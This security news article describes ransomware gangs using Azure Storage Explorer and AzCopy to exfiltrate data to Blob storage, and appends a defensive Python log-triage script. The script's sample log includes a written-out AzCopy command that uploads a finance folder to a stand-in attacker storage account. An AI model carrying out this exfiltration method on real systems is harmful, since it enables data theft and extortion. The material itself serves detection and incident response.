Ransomware Gangs Leverage Microsoft Azure Tools for Data Exfiltration in Sophisticated Attacks

By Admin | 2024-09-21 | Vulnerabilities

Cybercriminal groups, including the notorious BianLian and Rhysida ransomware gangs, have begun exploiting Microsoft’s Azure Storage Explorer and AzCopy tools to steal data from compromised networks, storing it in Azure Blob storage for later retrieval. This emerging tactic was identified in attacks observed by cybersecurity firm modePUSH, signalling a growing trend in using enterprise cloud services for malicious purposes.


Azure Tools: A Double-Edged Sword

Microsoft Azure Storage Explorer, a GUI-based tool for managing Azure storage, and AzCopy, a command-line utility for large-scale data transfers, have become key components in these ransomware operations. Threat actors utilize these tools to swiftly upload vast amounts of stolen data to Azure Blob storage, a scalable and enterprise-trusted cloud service. Once the data is securely stored in the cloud, attackers can transfer it to their repositories, evading many traditional security measures.

While using these tools, attackers are reportedly overcoming challenges, such as installing dependencies and upgrading to .NET version 8, to enable Azure Storage Explorer. The effort suggests an increasing focus on data theft, now the primary leverage in ransomware extortion campaigns.


Why Azure?

Ransomware groups have historically relied on tools like Rclone and MEGAsync to synchronize stolen files with cloud providers. However, Azure offers unique advantages. As a trusted enterprise-grade service, it is less likely to be flagged or blocked by corporate firewalls and security tools. This makes Azure an ideal choice for discreet data exfiltration, as data transfers are more likely to pass undetected.

Additionally, Azure’s ability to handle large volumes of unstructured data at high speeds further appeals to threat actors aiming to exfiltrate substantial amounts of information in minimal time. modePUSH observed that attackers often use multiple instances of Azure Storage Explorer in parallel, accelerating the data upload process to blob containers.


Detecting and Defending Against Ransomware Exfiltration

Investigators noted that the ransomware actors left the default 'Info' level logging enabled when using Storage Explorer and AzCopy. This creates log files in the %USERPROFILE%\.azcopy directory, offering valuable evidence for incident responders. These logs record each file operation, such as successful uploads (UPLOADSUCCESSFUL) and successful downloads (DOWNLOADSUCCESSFUL, which may indicate payloads being brought into the environment), aiding in damage assessment and response.

To defend against such tactics, cybersecurity teams should monitor for the execution of AzCopy, track outbound network traffic to Azure Blob Storage endpoints (e.g., ".blob.core.windows.net"), and set up alerts for unusual file copying or access patterns on critical servers. Organizations already using Azure are advised to enable Storage Explorer's 'Logout on Exit' feature to automatically sign out of the application after each session, minimizing the risk of attackers exploiting active sessions for data theft.
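As an added example (not code from the original article or from modePUSH), the following Python script shows how an incident responder might triage the AzCopy log files described above: it pulls out UPLOADSUCCESSFUL and DOWNLOADSUCCESSFUL entries, collects the Blob storage account names referenced in the log, and flags uploads to any account the organisation does not own. The sample log lines, their exact layout, and the storage account names are constructed assumptions.

```python
import re

# Constructed sample of an AzCopy log (not real tool output; the line layout is an
# assumption). The UPLOADSUCCESSFUL / DOWNLOADSUCCESSFUL markers are the ones
# the article points to; the storage account "exfilstore" is a made-up name.
SAMPLE_LOG = r"""
2024/09/21 02:14:03 INFO: Job started: azcopy copy "D:\Finance" "https://exfilstore.blob.core.windows.net/dump?sv=REDACTED" --recursive
2024/09/21 02:14:05 INFO: [P#0-T#0] UPLOADSUCCESSFUL: D:\Finance\payroll_2024.xlsx
2024/09/21 02:14:05 INFO: [P#0-T#1] UPLOADSUCCESSFUL: D:\Finance\contracts\acme.pdf
2024/09/21 02:14:06 INFO: [P#0-T#2] UPLOADFAILED: D:\Finance\locked.db
2024/09/21 02:15:40 INFO: [P#1-T#0] DOWNLOADSUCCESSFUL: C:\Windows\Temp\svc.exe
"""

# One transfer result per line: timestamp, then the outcome marker and the local path.
EVENT_RE = re.compile(
    r"^(?P<ts>\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}) .*?"
    r"\b(?P<op>UPLOADSUCCESSFUL|DOWNLOADSUCCESSFUL): (?P<path>.+)$"
)
# Storage account name in any Blob endpoint URL mentioned in the log.
BLOB_RE = re.compile(r"https://([a-z0-9]+)\.blob\.core\.windows\.net/")


def parse_azcopy_log(text):
    """Extract transfer events and the sorted set of Blob storage accounts referenced."""
    events, accounts = [], set()
    for line in text.splitlines():
        m = EVENT_RE.match(line)
        if m:
            events.append(m.groupdict())
        accounts.update(BLOB_RE.findall(line))
    return events, sorted(accounts)


def triage(text, allowed_accounts=()):
    """Summarise a log: uploads to an unknown storage account are the exfiltration signal."""
    events, accounts = parse_azcopy_log(text)
    uploaded = [e["path"] for e in events if e["op"] == "UPLOADSUCCESSFUL"]
    downloaded = [e["path"] for e in events if e["op"] == "DOWNLOADSUCCESSFUL"]
    unknown = [a for a in accounts if a not in allowed_accounts]
    return {
        "uploaded": uploaded,            # what left the host (damage assessment)
        "downloaded": downloaded,        # what came in (possible tooling/payloads)
        "unknown_accounts": unknown,     # Blob accounts outside the allow-list
        "suspicious": bool(uploaded) and bool(unknown),
    }


if __name__ == "__main__":
    print(triage(SAMPLE_LOG, allowed_accounts=("corpbackup",)))
```

In a real engagement the text would come from the *.log files under %USERPROFILE%\.azcopy on the affected host, and the allow-list from the organisation's inventory of its own storage accounts.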

As ransomware tactics evolve, organizations must remain vigilant, monitoring for unusual activity and leveraging robust cloud security practices to mitigate the risks posed by increasingly sophisticated threat actors.